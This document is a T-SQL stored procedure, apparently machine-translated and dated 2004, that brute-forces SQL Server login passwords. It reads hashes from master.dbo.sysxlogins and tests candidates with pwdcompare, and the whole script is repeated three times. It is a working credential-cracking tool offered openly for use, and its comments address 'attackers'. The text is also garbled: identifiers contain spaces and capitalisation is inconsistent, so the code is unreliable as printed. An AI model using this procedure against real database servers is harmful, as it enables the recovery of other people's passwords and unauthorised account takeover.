Stored Procedure for brute-force cracking of SQL passwords

If exists (select * From DBO. sysobjects where id = object_id (n' [DBO]. [p_getpassword] ') and objectproperty (ID, n' isprocedure') = 1)
Drop procedure [DBO]. [p_getpassword]
Go
 
/* -- Brute-force cracking SQL Server user password
 
Attackers can crack passwords with Chinese characters, special characters, characters, and trailing spaces.
For the convenience of displaying passwords with special characters, the displayed results show the ASCII
 
Theoretically, attackers can crack passwords of any number of digits.
The condition is that your computer is configured enough time
 
-- Producer build 2004.08 (reference please keep this information )--*/
 
/* -- Call example

-- Test special characters
Declare @ PWD sysname
Set @ Pwd = char (0) + 'A'
Exec sp_password null, @ PWD, 'sa'
Exec p_getpassword
 
-- Test the password with spaces
Exec sp_password null, 'A', 'sa'
Exec p_getpassword

-- Test Chinese
Exec sp_password null, 'I', 'sa'
Exec p_getpassword
 
-- Clear Password
Exec sp_password null, null, 'sa'
--*/
Create proc p_getpassword
@ Username sysname = NULL, -- user name. If this parameter is not specified, all users are listed.
@ Pwdlen Int = 3 -- number of digits for password cracking. By default, only three or less passwords are cracked.
As
-- Generate the user table of the password to be cracked
Select name, password
, Type = case when xstatus & 2048 = 2048 then 1 else 0 end
, JM = case when password is null or datalength (password) <46
Then 1 else 0 end
, Pwdstr = case when datalength (password) <46
Then cast (password as sysname)
Else cast (''as sysname) End
, Pwd = cast (''as varchar (8000 ))
Into # pwd
From master. DBO. sysxlogins
Where srvid is null
And name = isnull (@ username, name)
 
-- Generate a temporary table
Select top 255 id = identity (INT,) into # T from sysobjects A, sysobjects B
Alter table # t add constraint pK _ # T primary key (ID)
 
-- Clear unnecessary characters
If not exists (select 1 from # PWD where type = 1)
Delete from # t where ID between 65 and 90 or ID between 129 and 254
 
-- Password cracking
Declare @ l int
Declare @ S1 varchar (8000), @ S2 varchar (8000), @ S3 varchar (8000), @ S4 varchar (8000)
 
-- Crack the 1-bit password
Select @ l = 0
, @ S1 = 'id = A. id'
, @ S2 = '# T'
, @ S3 = 'Char (B. ID )'
, @ S4 = 'Cast (B. ID as varchar )'
Exec ('
Update PWD set JM = 1, pwdstr = '+ @ S3 +'
, Pwd = '+ @ S4 +'
From # PWD, # T B
Where PWD. jm = 0
And pwdcompare ('+ @ S3 +', PWD. Password, PWD. Type) = 1
')
 
-- Crack passwords with more than two digits
While exists (select 1 from # PWD where JM = 0 and @ l <@ pwdlen-1)
Begin
Select @ l = @ L + 1
, @ S1 = @ S1 + ', id' + Cast (@ l as varchar)
+ '=' + Char (@ l/26 + 97) + char (@ l % 26 + 97) + '. id'
, @ S2 = @ S2 + ', # t' + char (@ l/26 + 97) + char (@ l % 26 + 97)
, @ S3 = @ S3 + '+ char (B. id' + Cast (@ l as varchar) + ')'
, @ S4 = @ S4 + '+ '','' + Cast (B. ID' + Cast (@ l as varchar) + 'as varchar )'
Exec ('
Select '+ @ S1 + 'into # TT from' + @ S2 +'
Update PWD set JM = 1, pwdstr = '+ @ S3 +'
, Pwd = '+ @ S4 +'
From # PWD, # TT B
Where PWD. jm = 0
And pwdcompare ('+ @ S3 +', PWD. Password, PWD. Type) = 1
')
End
 
-- Display the cracked Password
Select username = Name, password = pwdstr, password ASCII = pwd
From # pwd
Go

If exists (select * From DBO. sysobjects where id = object_id (n' [DBO]. [p_getpassword] ') and objectproperty (ID, n' isprocedure') = 1)
Drop procedure [DBO]. [p_getpassword]
Go
 
/* -- Brute-force cracking SQL Server user password
 
Attackers can crack passwords with Chinese characters, special characters, characters, and trailing spaces.
For the convenience of displaying passwords with special characters, the displayed results show the ASCII
 
Theoretically, attackers can crack passwords of any number of digits.
The condition is that your computer is configured enough time
 
-- Producer build 2004.08 (reference please keep this information )--*/
 
/* -- Call example

-- Test special characters
Declare @ PWD sysname
Set @ Pwd = char (0) + 'A'
Exec sp_password null, @ PWD, 'sa'
Exec p_getpassword
 
-- Test the password with spaces
Exec sp_password null, 'A', 'sa'
Exec p_getpassword

-- Test Chinese
Exec sp_password null, 'I', 'sa'
Exec p_getpassword
 
-- Clear Password
Exec sp_password null, null, 'sa'
--*/
Create proc p_getpassword
@ Username sysname = NULL, -- user name. If this parameter is not specified, all users are listed.
@ Pwdlen Int = 3 -- number of digits for password cracking. By default, only three or less passwords are cracked.
As
-- Generate the user table of the password to be cracked
Select name, password
, Type = case when xstatus & 2048 = 2048 then 1 else 0 end
, JM = case when password is null or datalength (password) <46
Then 1 else 0 end
, Pwdstr = case when datalength (password) <46
Then cast (password as sysname)
Else cast (''as sysname) End
, Pwd = cast (''as varchar (8000 ))
Into # pwd
From master. DBO. sysxlogins
Where srvid is null
And name = isnull (@ username, name)
 
-- Generate a temporary table
Select top 255 id = identity (INT,) into # T from sysobjects A, sysobjects B
Alter table # t add constraint pK _ # T primary key (ID)
 
-- Clear unnecessary characters
If not exists (select 1 from # PWD where type = 1)
Delete from # t where ID between 65 and 90 or ID between 129 and 254
 
-- Password cracking
Declare @ l int
Declare @ S1 varchar (8000), @ S2 varchar (8000), @ S3 varchar (8000), @ S4 varchar (8000)
 
-- Crack the 1-bit password
Select @ l = 0
, @ S1 = 'id = A. id'
, @ S2 = '# T'
, @ S3 = 'Char (B. ID )'
, @ S4 = 'Cast (B. ID as varchar )'
Exec ('
Update PWD set JM = 1, pwdstr = '+ @ S3 +'
, Pwd = '+ @ S4 +'
From # PWD, # T B
Where PWD. jm = 0
And pwdcompare ('+ @ S3 +', PWD. Password, PWD. Type) = 1
')
 
-- Crack passwords with more than two digits
While exists (select 1 from # PWD where JM = 0 and @ l <@ pwdlen-1)
Begin
Select @ l = @ L + 1
, @ S1 = @ S1 + ', id' + Cast (@ l as varchar)
+ '=' + Char (@ l/26 + 97) + char (@ l % 26 + 97) + '. id'
, @ S2 = @ S2 + ', # t' + char (@ l/26 + 97) + char (@ l % 26 + 97)
, @ S3 = @ S3 + '+ char (B. id' + Cast (@ l as varchar) + ')'
, @ S4 = @ S4 + '+ '','' + Cast (B. ID' + Cast (@ l as varchar) + 'as varchar )'
Exec ('
Select '+ @ S1 + 'into # TT from' + @ S2 +'
Update PWD set JM = 1, pwdstr = '+ @ S3 +'
, Pwd = '+ @ S4 +'
From # PWD, # TT B
Where PWD. jm = 0
And pwdcompare ('+ @ S3 +', PWD. Password, PWD. Type) = 1
')
End
 
-- Display the cracked Password
Select username = Name, password = pwdstr, password ASCII = pwd
From # pwd
Go

If exists (select * From DBO. sysobjects where id = object_id (n' [DBO]. [p_getpassword] ') and objectproperty (ID, n' isprocedure') = 1)
Drop procedure [DBO]. [p_getpassword]
Go
 
/* -- Brute-force cracking SQL Server user password
 
Attackers can crack passwords with Chinese characters, special characters, characters, and trailing spaces.
For the convenience of displaying passwords with special characters, the displayed results show the ASCII
 
Theoretically, attackers can crack passwords of any number of digits.
The condition is that your computer is configured enough time
 
-- Producer build 2004.08 (reference please keep this information )--*/
 
/* -- Call example

-- Test special characters
Declare @ PWD sysname
Set @ Pwd = char (0) + 'A'
Exec sp_password null, @ PWD, 'sa'
Exec p_getpassword
 
-- Test the password with spaces
Exec sp_password null, 'A', 'sa'
Exec p_getpassword

-- Test Chinese
Exec sp_password null, 'I', 'sa'
Exec p_getpassword
 
-- Clear Password
Exec sp_password null, null, 'sa'
--*/
Create proc p_getpassword
@ Username sysname = NULL, -- user name. If this parameter is not specified, all users are listed.
@ Pwdlen Int = 3 -- number of digits for password cracking. By default, only three or less passwords are cracked.
As
-- Generate the user table of the password to be cracked
Select name, password
, Type = case when xstatus & 2048 = 2048 then 1 else 0 end
, JM = case when password is null or datalength (password) <46
Then 1 else 0 end
, Pwdstr = case when datalength (password) <46
Then cast (password as sysname)
Else cast (''as sysname) End
, Pwd = cast (''as varchar (8000 ))
Into # pwd
From master. DBO. sysxlogins
Where srvid is null
And name = isnull (@ username, name)
 
-- Generate a temporary table
Select top 255 id = identity (INT,) into # T from sysobjects A, sysobjects B
Alter table # t add constraint pK _ # T primary key (ID)
 
-- Clear unnecessary characters
If not exists (select 1 from # PWD where type = 1)
Delete from # t where ID between 65 and 90 or ID between 129 and 254
 
-- Password cracking
Declare @ l int
Declare @ S1 varchar (8000), @ S2 varchar (8000), @ S3 varchar (8000), @ S4 varchar (8000)
 
-- Crack the 1-bit password
Select @ l = 0
, @ S1 = 'id = A. id'
, @ S2 = '# T'
, @ S3 = 'Char (B. ID )'
, @ S4 = 'Cast (B. ID as varchar )'
Exec ('
Update PWD set JM = 1, pwdstr = '+ @ S3 +'
, Pwd = '+ @ S4 +'
From # PWD, # T B
Where PWD. jm = 0
And pwdcompare ('+ @ S3 +', PWD. Password, PWD. Type) = 1
')
 
-- Crack passwords with more than two digits
While exists (select 1 from # PWD where JM = 0 and @ l <@ pwdlen-1)
Begin
Select @ l = @ L + 1
, @ S1 = @ S1 + ', id' + Cast (@ l as varchar)
+ '=' + Char (@ l/26 + 97) + char (@ l % 26 + 97) + '. id'
, @ S2 = @ S2 + ', # t' + char (@ l/26 + 97) + char (@ l % 26 + 97)
, @ S3 = @ S3 + '+ char (B. id' + Cast (@ l as varchar) + ')'
, @ S4 = @ S4 + '+ '','' + Cast (B. ID' + Cast (@ l as varchar) + 'as varchar )'
Exec ('
Select '+ @ S1 + 'into # TT from' + @ S2 +'
Update PWD set JM = 1, pwdstr = '+ @ S3 +'
, Pwd = '+ @ S4 +'
From # PWD, # TT B
Where PWD. jm = 0
And pwdcompare ('+ @ S3 +', PWD. Password, PWD. Type) = 1
')
End
 
-- Display the cracked Password
Select username = Name, password = pwdstr, password ASCII = pwd
From # pwd
Go